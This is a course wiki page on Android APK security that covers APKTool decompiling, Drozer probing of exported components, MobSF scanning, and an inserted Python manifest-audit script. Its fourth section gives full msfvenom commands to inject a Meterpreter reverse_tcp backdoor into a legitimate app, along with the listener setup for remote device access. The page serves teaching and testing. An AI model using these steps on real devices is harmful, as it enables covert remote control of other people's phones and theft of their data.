Hands-on: Android APK Analysis and Exploitation (en)

From OnnoWiki
Revision as of 18:10, 27 October 2024 by Onnowpurbo (talk | contribs)

To conduct analysis and exploitation of Android APKs in an ethical hacking course, we will utilize several tools in Kali Linux 2024.3, including APKTool, Drozer, and MobSF. Here are the steps to follow:

1. Analyzing Android APK with APKTool

APKTool is used for unpacking and modifying APKs. We can use APKTool to decode an APK and examine its resources and disassembled (smali) code, particularly AndroidManifest.xml, which declares the permissions the application requests and the components it exposes.

Steps:

  • Install APKTool: Ensure APKTool is installed. If not, install it with the command:
sudo apt install apktool
  • Decompile APK: To analyze the APK, first decompile the APK file:
apktool d target_app.apk -o output_folder

This will extract the contents of the APK into the `output_folder`.

  • Analyze AndroidManifest.xml: This file contains the permissions requested by the application. Open and analyze it to check for suspicious permissions like access to SMS, storage, or location that may not be necessary.
  • Modify and Recompile APK: After modifications, the APK can be recompiled:
apktool b output_folder -o new_app.apk
  • Sign APK: After generating the new APK, sign it with a key:
jarsigner -keystore my-release-key.keystore new_app.apk alias_name

Example: Suppose the application requests SMS access without a clear reason. We can use APKTool to modify the manifest, disable the permission, and recompile the app.
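As an added example (not part of the original wiki page), the following Python script performs the manifest review described above on a decoded `AndroidManifest.xml`: it flags the sensitive permissions the text names, lists the components other apps can reach, and removes a permission the way one would before running `apktool b`. The manifest is constructed for the demonstration, and the set of sensitive permissions is an assumption drawn from the page's SMS, storage and location examples.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

def android_attr(name):
    # Qualified name of an android:* attribute as ElementTree sees it
    return f"{{{ANDROID_NS}}}{name}"

# Assumption: permissions a reviewer should expect the app to justify (not exhaustive).
SENSITIVE_PERMISSIONS = {"android.permission.READ_SMS", "android.permission.SEND_SMS",
                         "android.permission.READ_EXTERNAL_STORAGE",
                         "android.permission.ACCESS_FINE_LOCATION"}

def audit_manifest(xml_text):
    root = ET.fromstring(xml_text)
    report = {"package": root.get("package"), "sensitive_permissions": [], "exported": []}
    for perm in root.findall("uses-permission"):
        name = perm.get(android_attr("name"))
        if name in SENSITIVE_PERMISSIONS:
            report["sensitive_permissions"].append(name)
    application = root.find("application")
    for tag in ("activity", "service", "receiver", "provider"):
        for comp in application.iter(tag):
            exported = comp.get(android_attr("exported"))
            has_filter = comp.find("intent-filter") is not None
            # exported="true" is explicit; unset plus an intent-filter was the implicit
            # default before targetSdk 31, so both count as reachable from other apps.
            if exported == "true" or (exported is None and has_filter):
                report["exported"].append((tag, comp.get(android_attr("name")),
                                           comp.get(android_attr("permission"))))
    return report

def remove_permission(xml_text, permission):
    # Drop a <uses-permission> entry: the manifest edit made before recompiling with apktool
    ET.register_namespace("android", ANDROID_NS)
    root = ET.fromstring(xml_text)
    for perm in list(root.findall("uses-permission")):
        if perm.get(android_attr("name")) == permission:
            root.remove(perm)
    return ET.tostring(root, encoding="unicode")

# Constructed sample manifest, standing in for output_folder/AndroidManifest.xml
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.targetapp">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <application android:label="Target">
    <activity android:name=".MainActivity"><intent-filter>
      <action android:name="android.intent.action.MAIN"/></intent-filter></activity>
    <provider android:name=".NotesProvider" android:exported="true"
        android:authorities="com.example.targetapp.provider"/>
    <service android:name=".SyncService"/></application></manifest>"""
```

The flagged provider is the same component the Drozer section below queries; the non-exported service is correctly left out of the report.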

2. Exploiting Application Using Drozer

Drozer is a powerful tool for exploiting Android APKs, especially for examining weaknesses in application components like activities, broadcast receivers, and content providers.

Steps:

  • Install Drozer: Install Drozer on Kali Linux.
sudo apt install drozer
  • Set up Drozer on the Android Device: Install `drozer-agent.apk` on the Android device, start the agent's embedded server, and forward its port so the console can connect:
adb install drozer-agent.apk
adb forward tcp:31415 tcp:31415
  • Connect Drozer with Target Application: After setup, connect Drozer to the target application:
drozer console connect
  • Analyze Attack Surface: Use the following command to analyze the application’s attack surface:
run app.package.info -a com.example.targetapp
  • Exploit Vulnerable Components: If the application exposes components like an activity or content provider, we can exploit these vulnerabilities. For example, if there is a vulnerable `ContentProvider`:
run app.provider.query content://com.example.targetapp.provider

Exploitation Example: Suppose an application has a misconfigured (exported and unprotected) content provider. Using Drozer, we can query it and access sensitive data from the application.

3. Vulnerability Analysis of APK with MobSF

Mobile Security Framework (MobSF) is an automated tool that facilitates comprehensive APK security analysis.

Steps:

  • Install MobSF: If MobSF is not installed, use Docker to install it:
docker pull opensecurity/mobile-security-framework-mobsf
docker run -it -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest
  • Upload APK: Once MobSF is running, open a browser and go to `http://localhost:8000`. Upload the APK you wish to analyze.
  • Automated Analysis: MobSF will automatically perform a static analysis of the APK, including scanning for malicious components, improper permissions, and insecure code and configuration patterns.

Example: Using MobSF, we can identify common weaknesses such as *hardcoded credentials*, *insecure storage*, and *weak cryptographic implementations*.

4. Using APK to Install a Backdoor

Advanced exploitation can include installing a backdoor in an APK using Metasploit.

Steps:

  • Create Backdoor APK with Metasploit:
msfvenom -p android/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -o backdoor.apk
  • Inject Backdoor into APK:
msfvenom -x original_app.apk -p android/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -o infected_app.apk
  • Run Listener:
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST <IP>
set LPORT <PORT>
exploit
  • Run APK on Target: After the backdoor APK is installed on the target device, we can gain a Meterpreter session and remotely access the device.

Conclusion

Using a combination of tools like APKTool, Drozer, and MobSF, we can conduct in-depth analysis of Android APKs and exploit their vulnerabilities. These steps include source code analysis, attack surface testing, and exploiting vulnerable components.
